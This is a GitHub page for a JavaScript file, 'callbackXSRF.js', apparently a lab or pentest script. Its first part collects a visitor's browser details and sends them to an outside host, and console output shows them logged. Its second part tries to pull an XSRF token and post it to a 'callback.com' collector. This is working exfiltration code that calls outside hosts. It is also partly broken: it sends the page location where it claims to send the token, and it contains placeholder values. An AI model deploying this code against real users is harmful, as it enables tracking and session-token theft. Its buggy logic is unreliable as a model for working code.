-
Notifications
You must be signed in to change notification settings - Fork 0
/
callbackXSRF.js
113 lines (89 loc) · 3.58 KB
/
callbackXSRF.js
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
update:
// Function to gather client information
function clientInformation() {
return {
userAgent: navigator.userAgent,
platform: navigator.platform,
language: navigator.language,
screenResolution: `${window.screen.width}x${window.screen.height}`,
timezone: Intl.DateTimeFormat().resolvedOptions().timeZone
};
}
// Function to send client information via POST
function sendClientInfoViaPost() {
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://lab.pro/index.php", true);
xhr.setRequestHeader("Content-Type", "application/json");
xhr.onreadystatechange = function() {
if (xhr.readyState === 4) {
if (xhr.status === 200) {
var response = JSON.parse(xhr.responseText);
console.log("Server Response (POST):", response);
} else {
console.error("Error (POST):", xhr.statusText);
}
}
};
// Send the client information as a JSON payload
xhr.send(JSON.stringify(clientInformation()));
}
// Function to send client information via GET
function sendClientInfoViaGet() {
var clientInfo = clientInformation();
var queryString = Object.keys(clientInfo).map(key => key + '=' + encodeURIComponent(clientInfo[key])).join('&');
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://lab.pro/index.php?" + queryString, true);
xhr.onreadystatechange = function() {
if (xhr.readyState === 4) {
if (xhr.status === 200) {
var response = JSON.parse(xhr.responseText);
console.log("Server Response (GET):", response);
} else {
console.error("Error (GET):", xhr.statusText);
}
}
};
// Send the request
xhr.send();
}
// Call the functions to send client info
sendClientInfoViaPost();
sendClientInfoViaGet();
output if success:
undefined
VM3643:22 Server Response (POST): {status: 'success', message: 'Data received and logged.'}
VM3643:45 Server Response (GET): {status: 'success', message: 'Data received and logged.'}
-----
---
function getXSRFToken() {
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://callback.com/?id=" + clientInformation(), true);
xhr.setRequestHeader("Content-Type", "application/json");
xhr.onreadystatechange = function() {
if (xhr.readyState === 4 && xhr.status === 200) {
var response = JSON.parse(xhr.responseText);
if (response && response._.$n) {
var xsrfToken = response._.$n.messageId;
sendToLabMachine(document.location);
}
}
};
xhr.send(JSON.stringify({
your: "data",
here: "value"
}));
}
function sendToLabMachine(token) {
var labXhr = new XMLHttpRequest();
labXhr.open("POST", "https://callback.com/?id=", true);
labXhr.setRequestHeader("Content-Type", "application/json");
labXhr.onreadystatechange = function() {
if (labXhr.readyState === 4 && labXhr.status === 200) {
console.log("Token sent to lab machine successfully.");
}
};
labXhr.send(JSON.stringify({
xsrfToken: token
}));
}
getXSRFToken();